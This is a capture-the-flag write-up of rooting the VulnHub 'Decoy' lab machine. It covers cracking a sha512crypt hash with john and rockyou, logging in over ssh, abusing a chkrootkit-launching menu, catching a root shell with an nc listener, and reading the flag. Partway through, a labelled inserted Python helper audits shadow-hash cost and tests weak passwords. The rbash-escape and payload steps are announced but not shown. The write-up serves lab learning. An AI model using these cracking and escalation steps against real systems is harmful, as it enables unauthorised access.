We crack the password with john and the rockyou wordlist.
~/ctf/vulnhub/decoy > sudo /usr/sbin/john tocrack.txt --wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server (96640a3b825115a47b68fc44501c828)
1g 0:00:00:05 DONE (2020-07-10 10:19) 0.1763g/s 3025p/s 3025c/s 3025C/s
felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password is "server".
We log in over ssh :)
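As an added example, not part of the original write-up: a small Python audit helper for shadow entries in the crypt(3) format john loaded above ($6$ sha512crypt at the default 5000 rounds). It reports the algorithm and iteration count (john's "Cost 1"), flags a low cost, and can test an entry against a short list of known-weak passwords. The shadow line, the salt "decoysalt" and the MIN_ROUNDS policy value are constructed assumptions, not values from the machine.

```python
# Added example, not from the original write-up. Parses "user:$id$[rounds=N$]salt$hash:..."
# shadow entries and, where the stdlib crypt module is usable, checks candidate passwords.
import re
from typing import NamedTuple

try:
    import crypt  # Linux stdlib up to Python 3.12; removed in 3.13
except ImportError:
    crypt = None

ALGOS = {"1": ("md5crypt", 1000), "5": ("sha256crypt", 5000), "6": ("sha512crypt", 5000)}
MIN_ROUNDS = 100_000  # assumed local policy: anything below this is cheap to brute-force
HASH_RE = re.compile(r"\$(?P<id>[156])\$(?:rounds=(?P<r>\d+)\$)?(?P<salt>[^$]{1,16})\$(?P<h>[^$:]+)")

class HashInfo(NamedTuple):
    user: str
    algo: str
    rounds: int      # iterations implied when no "rounds=" field is present
    salt: str
    weak_cost: bool  # md5crypt is fixed at 1000 rounds; sha-crypt defaults to 5000

def parse_shadow_line(line: str) -> HashInfo:
    """Split 'user:$id$[rounds=N$]salt$hash:...' into its components."""
    user, field = line.split(":")[:2]
    m = HASH_RE.fullmatch(field)
    if not m:
        raise ValueError(f"unsupported or malformed hash field for {user!r}")
    algo, rounds = ALGOS[m["id"]]
    rounds = int(m["r"]) if m["r"] else rounds
    return HashInfo(user, algo, rounds, m["salt"], rounds < MIN_ROUNDS)

def _crypt(password, setting):
    """crypt(3) wrapper returning None where the module or the method is unavailable."""
    try:
        out = crypt.crypt(password, setting) if crypt else None
    except (OSError, ValueError):
        return None
    return out if out and out.startswith(setting) else None

def check_candidates(line, candidates):
    """Return the first candidate that reproduces the stored digest, else None."""
    field = line.split(":")[1]
    setting = field.rsplit("$", 1)[0] + "$"  # "$6$[rounds=N$]salt$" is the crypt setting
    return next((c for c in candidates if _crypt(c, setting) == field), None)

def sample_shadow_line(password: str = "server") -> str:
    """Constructed entry: a real sha512crypt digest of `password` at 5000 rounds
    when crypt supports it, otherwise an obvious placeholder digest."""
    digest = _crypt(password, "$6$decoysalt$") or "$6$decoysalt$" + "x" * 86
    return f"296640a3b825115a47b68fc44501c828:{digest}:18450:0:99999:7:::"
```

Running `parse_shadow_line` over a real /etc/shadow shows which accounts still sit at the 5000-round default that let john test about 3000 candidates per second here; raising `rounds=` in the PAM/libxcrypt configuration is the corresponding hardening.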
Low Shell
~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123
The authenticity of host '192.168.1.123 (192.168.1.123)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.123' (ECDSA) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.1.123's password:
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
Once logged in we see that we are in a "restricted shell".
To escape it, we log in as follows:
Finally, we run the honeypot.decoy program located in our home directory and
select option 5, so that it launches chkrootkit.
<0832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
After a moment... we get the root shell! :)
~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.123] 54282
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@60832e9f188106ec5bcc4eb7709ce592:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root.txt
root@60832e9f188106ec5bcc4eb7709ce592:~# cat root.txt
cat root.txt
........::::::::::::.. .......|...............::::::::........
.:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::.......
. ........... / \\_ \ | / ...... . ........./\
...:::../\\_ ...... ..._/' \\\_ \###/ /\_ .../ \_....... _//
.::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....////
_/ \\\\ _/ \\\ / x \\\\###//// \//// \__ _/////
./ x \\\/ \/ x X \////// \/////
/ XxX \\/ XxX X //// x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
X _X * X ** ** x ** * X
_X _X x * x X_
1c203242ab4b4509233ca210d50d2cc5
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
End
And with that we are root on the machine :)